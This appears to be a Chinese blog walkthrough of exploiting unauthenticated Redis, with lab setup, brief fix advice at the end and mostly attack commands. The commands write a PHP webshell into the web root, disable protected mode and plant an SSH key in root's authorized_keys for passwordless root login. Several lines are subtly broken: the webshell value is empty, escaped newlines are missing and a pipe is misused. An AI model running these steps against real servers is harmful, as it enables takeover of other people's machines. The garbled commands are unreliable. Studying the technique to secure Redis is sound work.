Redis 默认情况下,会绑定在本地6379端口,如果没有进行相关策略,会将 Redis 服务暴露到公网上,在没有设置密码认证(默认为空)的情况下,任意用户在可以访问目标服务器的情况下未授权访问Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下,利用 Redis 自身的提供的config 命令,可以进行写文件操作,可以将ssh公钥写入目标服务器的 /root/.ssh/authotrized_keys 文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。
环境搭建下载redis软件包:
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
tar xzvf redis-2.8.17.tar.gz #解压安装包
cd redis-2.8.17 #进入redis目录
make #编译
cp usr/redis-server /usr/bin/
cp usr/redis-cli /usr/bin/ #将redis-server和redis-cli拷贝到/usr/bin目录下
cp redis.conf /etc/ #将redis.conf拷贝到/etc/目录下
redis-server /etc/redis.conf #使用/etc/目录下的redis.conf文件中的配置启动
redis-server启动redis数据库服务:
redis客户端“redis-cli”.
漏洞利用 写入webshell需要目标开启了网页服务,然后写webshell到网站目录。
可以先使用nmap探测一下:
利用:
redis-cli -h ip -p port #不指定端口的话默认是6379
info
config set dir /var/www/html
config set dbfilename redis-test.php
set test-webshell ""
save
然后查看一下目标机器这边网页目录:
成功写入。
SSH免密码登录将自己的公钥储存在远程主机上,登录时远程主机会向用户发送一段随机字符串,用自己的私钥加密后再发回来。远程主机用事先储存的公钥进行解密,如果成功则允许直接空密码ssh登录。
先探测ssh端口开放:
在本地生成公钥文件(回车默认即可):
ssh-keygen -t rsa
生成的文件路径在用户的家目录的".ssh"文件夹下:
cd ~/.ssh | ls
将秘钥写入一个文件用于查看并上传redis服务器:
(echo -e "nn"; cat id_rsa.pub; echo -e "nn") > key.txt
将key.txt里面的内容写入远程的 Redis 服务器上并且设置其 Key为一个命令(这里设置的test):
如果上传报错的话,可能是主机处于保护模式只允许redis本地链接,需要修改配置文件../redis.conf 需要在服务器上关闭保护模式:
redis-cli -h ip -p port
config set protected-mode no
然后再尝试一下上传,返回ok即上传成功。
登录redis服务器查看公钥已经添加到 Redis 的服务器上了并执行如下命令:
keys *
get test
config set dir /root/.ssh
config set dbfilename authorized_keys
save
测试ssh登录:
ssh -i id_rsa root@ip
登录成功。
修复建议
1./etc/redis.conf 中找到 “requirepass” 字段在后面设置复杂口令
2./etc/redis.conf中配置protected-mode yes
3.更改默认端口
结语
已无暇顾及过去,要向前走。
